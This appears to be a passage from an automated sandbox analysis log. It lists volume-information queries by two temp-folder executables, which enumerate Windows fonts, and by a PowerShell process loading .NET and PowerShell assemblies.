Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\31F4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
